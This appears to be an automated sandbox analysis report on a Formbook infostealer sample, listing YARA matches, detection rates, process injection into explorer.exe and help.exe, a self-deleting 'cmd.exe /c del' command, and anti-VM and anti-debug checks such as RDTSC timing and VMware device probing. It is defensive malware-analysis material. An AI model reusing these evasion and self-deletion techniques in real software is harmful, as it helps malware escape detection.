          Source: 00000000.00000002.218657751.0000000002170000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.218657751.0000000002170000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.265737304.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.265737304.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.266028847.00000000009B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.266028847.00000000009B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.479612487.0000000000AF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.479612487.0000000000AF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.216588771.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.216588771.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.KY4cmAI0jU.exe.2170000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.KY4cmAI0jU.exe.2170000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.KY4cmAI0jU.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.KY4cmAI0jU.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.KY4cmAI0jU.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.KY4cmAI0jU.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.KY4cmAI0jU.exe.2170000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.KY4cmAI0jU.exe.2170000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.KY4cmAI0jU.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.KY4cmAI0jU.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.KY4cmAI0jU.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.KY4cmAI0jU.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/4@13/8
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 0_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 0_2_00402020 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6060:120:WilError_01
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeFile created: C:\Users\user\AppData\Local\Temp\nssF13E.tmpJump to behavior
          Source: KY4cmAI0jU.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: KY4cmAI0jU.exeVirustotal: Detection: 34%
          Source: KY4cmAI0jU.exeMetadefender: Detection: 17%
          Source: KY4cmAI0jU.exeReversingLabs: Detection: 41%
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeFile read: C:\Users\user\Desktop\KY4cmAI0jU.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\KY4cmAI0jU.exe 'C:\Users\user\Desktop\KY4cmAI0jU.exe'
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeProcess created: C:\Users\user\Desktop\KY4cmAI0jU.exe 'C:\Users\user\Desktop\KY4cmAI0jU.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\KY4cmAI0jU.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeProcess created: C:\Users\user\Desktop\KY4cmAI0jU.exe 'C:\Users\user\Desktop\KY4cmAI0jU.exe'
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\KY4cmAI0jU.exe'
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: wntdll.pdbUGP source: KY4cmAI0jU.exe, 00000000.00000003.213745090.00000000099C0000.00000004.00000001.sdmp, KY4cmAI0jU.exe, 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, help.exe, 00000006.00000002.481376973.0000000002FEF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: KY4cmAI0jU.exe, help.exe
          Source: Binary string: help.pdbGCTL source: KY4cmAI0jU.exe, 00000001.00000002.266136705.0000000000A40000.00000040.00000001.sdmp
          Source: Binary string: help.pdb source: KY4cmAI0jU.exe, 00000001.00000002.266136705.0000000000A40000.00000040.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeUnpacked PE file: 1.2.KY4cmAI0jU.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 0_2_73752F60 push eax; ret
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_0041C9AD push eax; ret
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_0040D291 push ebp; iretd
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_0041B3C5 push eax; ret
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_0040C394 pushad ; ret
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_0041B47C push eax; ret
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_0041B412 push eax; ret
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_0041B41B push eax; ret
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00414E45 push ebp; iretd
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_004106D4 push cs; iretd
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00414F4F push ss; ret
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B1D0D1 push ecx; ret
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_0041C9AD push eax; ret
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_0040D291 push ebp; iretd
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_0041B3C5 push eax; ret
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_0040C394 pushad ; ret
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_0041B47C push eax; ret
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_0041B412 push eax; ret
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_0041B41B push eax; ret
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_00414E45 push ebp; iretd
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_004106D4 push cs; iretd
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_00414F4F push ss; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F4D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_0057C9AD push eax; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_0056D291 push ebp; iretd
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_0057B3C5 push eax; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_0056C394 pushad ; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_0057B47C push eax; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_0057B412 push eax; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_0057B41B push eax; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_0057C4F5 push cs; iretd
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeFile created: C:\Users\user\AppData\Local\Temp\nssF140.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeRDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 00000000005685F4 second address: 00000000005685FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 000000000056898E second address: 0000000000568994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_004088C0 rdtsc
          Source: C:\Windows\explorer.exe TID: 6128Thread sleep time: -40000s >= -30000s
          Source: C:\Windows\SysWOW64\help.exe TID: 5796Thread sleep time: -48000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 0_2_00405E61 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 0_2_0040263E FindFirstFileA,
          Source: explorer.exe, 00000002.00000000.235214151.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000002.00000000.235214151.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000002.00000000.244267378.0000000001398000.00000004.00000020.sdmpBinary or memory string: War&Prod_VMware_SATAR
          Source: explorer.exe, 00000002.00000000.232695480.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000002.00000000.234998239.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.227568679.0000000004E61000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAv
          Source: explorer.exe, 00000002.00000000.255829741.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000002.00000000.235214151.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000002.00000000.235214151.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000002.00000000.235308086.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000002.00000000.228165850.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000002.00000000.232695480.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000002.00000000.232695480.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000002.00000000.232695480.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\help.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_004088C0 rdtsc
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00409B30 LdrLoadDll,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B090AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B43884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B43884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B5B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ADB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ADB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ADB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ADB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B94015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B94015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B82073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B91074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B469A6 mov eax, dword ptr fs:[00000030h]
